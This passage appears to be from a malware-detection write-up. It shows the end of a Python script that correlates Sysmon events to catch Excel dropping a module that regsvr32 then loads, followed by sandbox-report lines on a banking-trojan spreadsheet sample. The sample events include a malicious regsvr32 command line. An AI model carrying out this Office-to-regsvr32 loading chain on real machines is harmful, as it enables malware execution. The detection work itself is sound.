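     "CommandLine": r"regsvr32 -s C:\ProgramData\Dori.ocx",
     "ParentImage": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE"},
    # benign control: an installer re-registering a system DLL
    {"EventID": 1, "ProcessId": 5022,
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Common Files\example\comp.dll"',
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
]


def _name(path):
    return ntpath.basename(path).lower()


def paths_in(cmdline):
    """Every Windows path on a command line, quoted or not."""
    return [quoted or bare for quoted, bare in PATH_RE.findall(cmdline)]


def analyze(events):
    """Return (rule, pid, detail) tuples. Events must be in time order so a
    FileCreate by an Office process can be matched to a later regsvr32 load."""
    findings, dropped = [], {}
    for ev in events:
        if ev["EventID"] == 11:
            if _name(ev["Image"]) in OFFICE_IMAGES:
                target = ev["TargetFilename"]
                dropped[target.lower()] = _name(ev["Image"])
                if target.lower().startswith(USER_WRITABLE):
                    findings.append(("office_writes_user_writable_dir", ev["ProcessId"], target))
            continue
        if ev["EventID"] != 1:
            continue
        parent, child = _name(ev["ParentImage"]), _name(ev["Image"])
        if parent in OFFICE_IMAGES and child in LOLBINS:
            findings.append(("office_spawns_lolbin", ev["ProcessId"], f"{parent} -> {child}"))
        if child == "regsvr32.exe":
            for path in paths_in(ev["CommandLine"]):
                low = path.lower()
                if low in dropped:
                    findings.append(("office_drop_registered", ev["ProcessId"],
                                     f"{dropped[low]} wrote {path}"))
                elif low.startswith(USER_WRITABLE):
                    findings.append(("regsvr32_loads_user_writable_module", ev["ProcessId"], path))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in analyze(SAMPLE_EVENTS):
        print(f"{rule:40} pid={pid} {detail}")
```

The correlation rule (Office wrote the exact file that regsvr32 later loads) is the one with the lowest false-positive rate; the parent-child rule on its own matches the same Sigma logic as "Microsoft Office Product Spawning Windows Shell" and will also fire on some legitimate add-in installers, so treat it as the trigger that makes the other two worth reading.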
Tries to load missing DLLs
Classification label
- Source: classification engine. Classification label: mal100.bank.troj.expl.evad.winXLSB@21/85@7/2
Creates files inside the user directory
- Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE. File created: C:\Users\user\Desktop\~$Rrapporto.xlsb
Creates temporary files
- Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE. File created: C:\Users\user\AppData\Local\Temp\{3D6002A5-3C2F-4D7A-9909-C104E420DDD5} - OProcSessId.dat
Queries process information (via WMI, Win32_Process)
- Source: C:\Windows\SysWOW64\regsvr32.exe. WMI queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from win32_process
Reads the hosts file
Spawns processes
Uses an in-process (OLE) Automation server
Found graphical window changes (likely an installer)
- Source: Window Recorder. Window detected: More than 3 window changes detected
Document is a ZIP file with path names indicative of goodware
- Source: Rrapporto.xlsb (initial sample): OLE zip file path = xl/media/image1.png
- Source: Rrapporto.xlsb (initial sample): OLE zip file path = xl/media/image2.png
Checks if Microsoft Office is installed
Uses new MSVCR Dlls